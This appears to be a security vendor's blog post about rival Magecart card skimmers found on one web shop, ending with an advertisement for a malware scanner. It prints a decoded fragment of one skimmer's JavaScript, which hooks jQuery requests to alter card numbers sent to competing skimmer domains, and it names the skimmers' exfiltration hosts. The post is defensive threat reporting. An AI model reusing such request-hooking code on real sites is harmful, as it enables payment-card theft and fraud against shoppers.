Get started in 5 minutes!

Competing digital skimmers sabotage each other

Sabotage

Skimmers found to subtly sabotage each others fraud operations

Competition is grim in the online skimming business (aka “MageCart”). The aggressive MagentoCore skimmer was previously observed to kick contending parasites from its victim hosts. But this week, we discovered that the battle has entered a new stage: advanced sabotage of each others revenue streams and reputation.

Sample case in question: cosmetics shop Bliv.com. It contains multiple distinct skimmers that send credit cards to different exfiltration hosts. The more advanced one is onlineclouds.cloud, which is heavily obfuscated and uses cloaking techniques. But with some sweating and curses, we decoded it (full source).

The interesting part is copied below. It detects whether any cards are sent to the (competing but inferior) skimmer domains js-react.com and bootstrap-js.com. Then, it subtly changes the last digit of the intercepted card number, effectively sending bogus card numbers to its competitor:

jQuery.ajaxSetup({
  beforeSend: function(jqXHR, settings) {
    if (settings.url.indexOf("js-react.com") !== -1 || 
    settings.url.indexOf('bootstrap-js.com') !== -1) {
      // ...
      var myRandom = Math.floor(Math.random() * 10);
      var old_cc = settings.data.match(cc);
      var new_data = settings.data.replace(
          new RegExp("[0-9]{13,16}", 'g'), 
          old_cc[0].slice(0, -1) + myRandom);
      settings.data = new_data;
    }
  }
});

Why the subtle sabotage, instead of just killing the inferior skimmer? On the dark web markets, reputation is everything. If one sells non-working cards, angry customers will publicly complain and it will destroy the competing “brand”.

It is not likely that the MageCart battle will be finished soon, so stay tuned…

Prevent Magecart attacks,
protect your web store
with Sansec's eComscan

Since our discovery of MageCart attacks in 2015, we've investigated thousands of hacked Magento web stores. All our research findings are added to our automated malware and vulnerability scanner for Magento and Adobe Commerce.
Merchants using eComscan are protected against the latest malware attacks and all known backdoors. eComscan provides an hourly vulnerability audit on all Magento versions, configurations, and extensions.

Try our malware scanner